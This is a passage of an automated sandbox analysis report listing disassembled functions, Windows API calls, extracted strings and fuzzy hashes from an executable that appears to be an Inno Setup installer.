Part of subcall function 00478884: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00478916,?,?,?,02122BD4,?,00478978,00000000,00478A8E,?,?,?,?), ref: 004788B4

ShellExecuteEx.SHELL32(0000003C), ref: 004789C8
GetLastError.KERNEL32(00000000,00478A8E,?,?,?,?), ref: 004789D1
MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00478A1E
GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478A42
CloseHandle.KERNEL32(00000000,00478A73,00000000,00000000,000000FF,000000FF,00000000,00478A6C,?,00000000,00478A8E,?,?,?,?), ref: 00478A66

Strings

ShellExecuteEx returned hProcess=0, xrefs: 004789F2
ShellExecuteEx, xrefs: 004789E2
MsgWaitForMultipleObjects, xrefs: 00478A2B
<, xrefs: 00478987
runas, xrefs: 00478995
GetExitCodeProcess, xrefs: 00478A4B

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
API String ID: 883996979-221126205
Opcode ID: b28b376a2be0868b0724ee08b6bb697a07dc67947066f4536c6a368308ef9766
Instruction ID: 790ad9f0fbfe83bf1512199edb7142052ce1d465f1a82f053b14324264bcdb90
Opcode Fuzzy Hash: b28b376a2be0868b0724ee08b6bb697a07dc67947066f4536c6a368308ef9766
Instruction Fuzzy Hash: 0C3124B0A40209AEDB10EFA6C845ADEB7A8EB04318F50853FF518E7282DF7C59458B1D

Function 0042286C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessageSendShowWindow
String ID:
API String ID: 1631623395-0
Opcode ID: ad20764d00b4e1bce030a3e3c27d486f6ceec107be95deacbd1ab04939794df1
Instruction ID: 28b3b238c6a175230bfdc04dc608b83412cf05ad4dc18caa3e002023b447773b
Opcode Fuzzy Hash: ad20764d00b4e1bce030a3e3c27d486f6ceec107be95deacbd1ab04939794df1
Instruction Fuzzy Hash: 5D915171B04214BFDB11EFA9DA86F9D77F4AB04314F5500B6F504AB3A2CB78AE409B58

Function 00418394 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004183A3
GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
GetWindowRect.USER32(?), ref: 004183DC
GetWindowLongA.USER32(?,000000F0), ref: 004183EA
GetWindowLongA.USER32(?,000000F8), ref: 004183FF
ScreenToClient.USER32(00000000), ref: 00418408
ScreenToClient.USER32(00000000,?), ref: 00418413

Strings

,, xrefs: 004183AC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ClientLongScreen$IconicPlacementRect
String ID: ,
API String ID: 2266315723-3772416878
Opcode ID: e1e10888711d407f8fe90eb8876dbc7d811cb5afcf9edaa6a068330facd90bcc
Instruction ID: 83451382f6561a1cdaf4068601f89ac1c3a417dc2c2f98083d52f4ec56b04d21
Opcode Fuzzy Hash: e1e10888711d407f8fe90eb8876dbc7d811cb5afcf9edaa6a068330facd90bcc
Instruction Fuzzy Hash: 10112871505201ABDB00EF69C885F9B77E8AF48314F180A7EBD58DB286D738D900CB6A

Function 0042F2F0 Relevance: 13.6, APIs: 9, Instructions: 108windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 0042F318
GetWindowLongA.USER32(?,000000F0), ref: 0042F32C
GetWindowLongA.USER32(?,000000EC), ref: 0042F343
GetActiveWindow.USER32 ref: 0042F34C
MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F379
SetActiveWindow.USER32(?,0042F4A9,00000000,?), ref: 0042F39A

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveLong$IconicMessage
String ID:
API String ID: 1633107849-0
Opcode ID: e8f6b6a421ea1d3179e4c98d77dd5a9a956952bb32a08c7b31a1e4991f2154d2
Instruction ID: 64d3bd35cbe97a20ddf06b1c5bb431ac215ab6611dc304e3324dca4d9728f060
Opcode Fuzzy Hash: e8f6b6a421ea1d3179e4c98d77dd5a9a956952bb32a08c7b31a1e4991f2154d2
Instruction Fuzzy Hash: 0E319C71A00254AFDB01EFB6DC52D6FBBB8EB0D714B9144BAB800E7291D6389D10CB68

Function 0045568C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0045569B
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004556A1
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004556BA
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 004556E1
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004556E6
ExitWindowsEx.USER32(00000002,00000000), ref: 004556F7

Strings

SeShutdownPrivilege, xrefs: 004556B3

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 6f0918c0c13bc2f4d4c54a185237749107d323edec97579a5aa57cfa3c3a92f6
Instruction ID: c3cc1ea1cd3915d7a33d422d8d95032da4a52c1e989dd5dcf2427ab637b102ec
Opcode Fuzzy Hash: 6f0918c0c13bc2f4d4c54a185237749107d323edec97579a5aa57cfa3c3a92f6
Instruction Fuzzy Hash: F8F06870694B42B9E610A6B1CC17F3B21C89B44749F50482AFD05EA1D3D7FCD9084A7E

Function 0045D230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D239
GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D249
GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D259
ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047FDF3,00000000,0047FE1C), ref: 0045D27E

Strings

ISCryptGetVersion, xrefs: 0045D233
ArcFourCrypt, xrefs: 0045D253
ArcFourInit, xrefs: 0045D243

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$CryptVersion
String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
API String ID: 1951258720-508647305
Opcode ID: e7d405a4ff4eebbc0640f86d2c220ba04bd3b21cd5ce18d39a7322497cc2147d
Instruction ID: 61c9e43cd1f728e0e46d113f0b501511b53ff9056e95746757012e10b94b60ba
Opcode Fuzzy Hash: e7d405a4ff4eebbc0640f86d2c220ba04bd3b21cd5ce18d39a7322497cc2147d
Instruction Fuzzy Hash: 9EF01DF1D01700DAD314DF76AD457263796EBA831AF08807BB800D61A2D779884ADE1C

Function 0049877C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004988BA,?,?,00000000,0049C628,?,00498A44,00000000,00498A98,?,?,00000000,0049C628), ref: 004987D3
SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00498856
FindNextFileA.KERNEL32(000000FF,?,00000000,00498892,?,00000000,?,00000000,004988BA,?,?,00000000,0049C628,?,00498A44,00000000), ref: 0049886E
FindClose.KERNEL32(000000FF,00498899,00498892,?,00000000,?,00000000,004988BA,?,?,00000000,0049C628,?,00498A44,00000000,00498A98), ref: 0049888C

Strings

isRS-???.tmp, xrefs: 004987BD
isRS-, xrefs: 004987F3

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstNext
String ID: isRS-$isRS-???.tmp
API String ID: 134685335-3422211394
Opcode ID: 2eac78899decf67a2599575f6ffc01aede9a3e72dfd4e437df88c1528b359898
Instruction ID: 01fac1220d05b00ddf84770a6e44258796d533cd1c1ae58874983c532305936c
Opcode Fuzzy Hash: 2eac78899decf67a2599575f6ffc01aede9a3e72dfd4e437df88c1528b359898
Instruction Fuzzy Hash: 6631587190161C6FDF10EF66CC41ADEBBBCDB46314F5184FBA808A32A1DB389E458E64

Function 0045763C Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 241windownativeCOMMON

Download Yara Rule

APIs

PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004576B9
PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 004576E0
SetForegroundWindow.USER32(?), ref: 004576F1
NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,004579C9,?,00000000,00457A05), ref: 004579B4

Strings

Cannot evaluate variable because [Code] isn't running yet, xrefs: 00457834

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: MessagePostWindow$ForegroundNtdllProc_
String ID: Cannot evaluate variable because [Code] isn't running yet
API String ID: 2236967946-3182603685
Opcode ID: 77aeb0a8c7fef545e84f15dd7e0a3ea2404ede663b2c5dd9e5d361db2ccce855
Instruction ID: bbeea18b3a5a77650d3de781f5d15eeacb1b42f9300217bc3a931905813ce4bc
Opcode Fuzzy Hash: 77aeb0a8c7fef545e84f15dd7e0a3ea2404ede663b2c5dd9e5d361db2ccce855
Instruction Fuzzy Hash: 64910174608204EFEB15CF65E951F5ABBF5FB4D304F2180BAE80497392C638AE05CB68

Function 00455EB4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455FF3), ref: 00455EE4
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455EEA

Strings

kernel32.dll, xrefs: 00455EDF
GetDiskFreeSpaceExA, xrefs: 00455EDA

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 6a98d8be3cefb5d1321440a09b2e8a7ab4abd71e514de144cb28141e7088ffe0
Instruction ID: c7998eed729051dc06c2a4bfb378ba8793a5d3ea0401748e56fe411d955f0a7d
Opcode Fuzzy Hash: 6a98d8be3cefb5d1321440a09b2e8a7ab4abd71e514de144cb28141e7088ffe0
Instruction Fuzzy Hash: 6C417471A04659AFCF01EFA5C8929EEB7B8EF48305F504567F800F7292D67C5E098B68

Function 00417CE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00417D1F
SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A

Strings

,, xrefs: 00417D61

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$Placement$Iconic
String ID: ,
API String ID: 568898626-3772416878
Opcode ID: 3b7cc9104e2877f08458343a95692454dc034f6994d69eb5de7ebf140b23916c
Instruction ID: 8a2405f126271a8a3f3b67151c5e9cb2aa668bd176c3c9f3f75a3d087e0924cd
Opcode Fuzzy Hash: 3b7cc9104e2877f08458343a95692454dc034f6994d69eb5de7ebf140b23916c
Instruction Fuzzy Hash: 90213171604208ABCF00EF69E8C0EEA77B8AF48314F05456AFD18DF346C678DD848B68

Function 00464200 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,004643E7), ref: 00464275
FindFirstFileA.KERNEL32(00000000,?,00000000,004643B2,?,00000001,00000000,004643E7), ref: 004642BB
FindNextFileA.KERNEL32(000000FF,?,00000000,00464394,?,00000000,?,00000000,004643B2,?,00000001,00000000,004643E7), ref: 00464370
FindClose.KERNEL32(000000FF,0046439B,00464394,?,00000000,?,00000000,004643B2,?,00000001,00000000,004643E7), ref: 0046438E

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: c85d62c4d2865e72f60ec0e72557d0bba9d6604f62721e170af8c43ffd28a37e
Instruction ID: c8116a204d28aaa02fd5c370c7a31de16c8845058ecf0009f09d6eac0a25a6e0
Opcode Fuzzy Hash: c85d62c4d2865e72f60ec0e72557d0bba9d6604f62721e170af8c43ffd28a37e
Instruction Fuzzy Hash: 9B415235B00A18DBCB10EF65DC95ADEB7B8EB88305F5045AAF804E7351E7389E848E59

Function 00463D84 Relevance: 7.6, APIs: 5, Instructions: 129fileCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001,00000000,00463F41), ref: 00463DB5
FindFirstFileA.KERNEL32(00000000,?,00000000,00463F14,?,00000001,00000000,00463F41), ref: 00463E44
FindNextFileA.KERNEL32(000000FF,?,00000000,00463EF6,?,00000000,?,00000000,00463F14,?,00000001,00000000,00463F41), ref: 00463ED6
FindClose.KERNEL32(000000FF,00463EFD,00463EF6,?,00000000,?,00000000,00463F14,?,00000001,00000000,00463F41), ref: 00463EF0

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseErrorFirstModeNext
String ID:
API String ID: 4011626565-0
Opcode ID: ac233fd01a22e69a44b0fa54206e939fdb01f3aa8599e3e7019d64004dcc1237
Instruction ID: 2cce399ef4bcfda7b326651f57ed136ac3b6341b478a121022c65868e2c33bfd
Opcode Fuzzy Hash: ac233fd01a22e69a44b0fa54206e939fdb01f3aa8599e3e7019d64004dcc1237
Instruction Fuzzy Hash: E341A730A006589FCB10EF65DC55ADEB7B8EB88305F4044BAF404A7381E77C9F448E59

Function 0042E944 Relevance: 7.6, APIs: 5, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452FB3,00000000,00452FD4), ref: 0042E966
DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E991
GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452FB3,00000000,00452FD4), ref: 0042E99E
CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452FB3,00000000,00452FD4), ref: 0042E9A6
SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452FB3,00000000,00452FD4), ref: 0042E9AC

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorLast$CloseControlCreateDeviceFileHandle
String ID:
API String ID: 1177325624-0
Opcode ID: 70fa8bed737ed64a54ebd93593d3916aa17312c499895c7e057b14e22e01e0f4
Instruction ID: 200206f6ebf05c62f8aab9c26c76e03d6a480d3026058df5ea69506491fbc91e
Opcode Fuzzy Hash: 70fa8bed737ed64a54ebd93593d3916aa17312c499895c7e057b14e22e01e0f4
Instruction Fuzzy Hash: 34F06DB23916203AF620A17A6C86F6F018C8785B68F10423BBA14FF1D1D9A89D0655AD

Function 00483E20 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 00483E5E
GetWindowLongA.USER32(00000000,000000F0), ref: 00483E7C
ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049D0A8,0048333A,0048336E,00000000,0048338E,?,?,?,0049D0A8), ref: 00483E9E
ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049D0A8,0048333A,0048336E,00000000,0048338E,?,?,?,0049D0A8), ref: 00483EB2

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$Show$IconicLong
String ID:
API String ID: 2754861897-0
Opcode ID: c386378a0c7f85d1cef37335c2bccc2b04846c6b77b58c4a4d67865339b810c4
Instruction ID: 4716aa9c85bcb67c2a447f96ffe7cd40772f798c99979f364c9f10fe2fefca1c
Opcode Fuzzy Hash: c386378a0c7f85d1cef37335c2bccc2b04846c6b77b58c4a4d67865339b810c4
Instruction Fuzzy Hash: 3C017C70A412416EE710BB29DC8AB6B23C45B14B09F48087BB8449B3A3DB3C9D8AC71C

Function 004627F8 Relevance: 4.6, APIs: 3, Instructions: 67fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,004628CC), ref: 00462850
FindNextFileA.KERNEL32(000000FF,?,00000000,004628AC,?,00000000,?,00000000,004628CC), ref: 0046288C
FindClose.KERNEL32(000000FF,004628B3,004628AC,?,00000000,?,00000000,004628CC), ref: 004628A6

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 3afcb13648a0263cf6f8f6bfedae53c76c54b9f835f65621a9b8af134bb0e919
Instruction ID: 841aaca985aa1eabcc65563c383ac57876b75d473b933154d1e9c72f52fa3cd7
Opcode Fuzzy Hash: 3afcb13648a0263cf6f8f6bfedae53c76c54b9f835f65621a9b8af134bb0e919
Instruction Fuzzy Hash: 3A210B31904A087FDB11FF65CD41ADEBBACDB49304F5045B7A808E32A1E67C8E44CE56

Function 004241EC Relevance: 4.5, APIs: 3, Instructions: 32windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 004241F4
SetActiveWindow.USER32(?,?,?,?,0046CE53), ref: 00424201

Part of subcall function 0042365C: ShowWindow.USER32(00410470,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021225AC,0042421A,?,?,?,?,0046CE53), ref: 00423B5F

SetFocus.USER32(00000000,?,?,?,?,0046CE53), ref: 0042422E

Memory Dump Source

Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Window$ActiveFocusIconicShow
String ID:
API String ID: 649377781-0
Opcode ID: 2caf509772b4e47572ac949d7f8b8f9ae0a5a4117a3619920a2f1982222ed166
Instruction ID: c379361f86f494b348edbf52cdf1d5c809bfbf5168ad2d96a2c3ff14c6914fef
Opcode Fuzzy Hash: 2caf509772b4e47572ac949d7f8b8f9ae0a5a4117a3619920a2f1982222ed166
Instruction Fuzzy Hash: B3F0DA717002209BDB10AFAAD8C5B9676A8EF48344B5541BBBD09DF35BCA7CDC018768

Function 0042EE28 Relevance: 4.5, APIs: 3, Instructions: 28synchronizationCOMMON

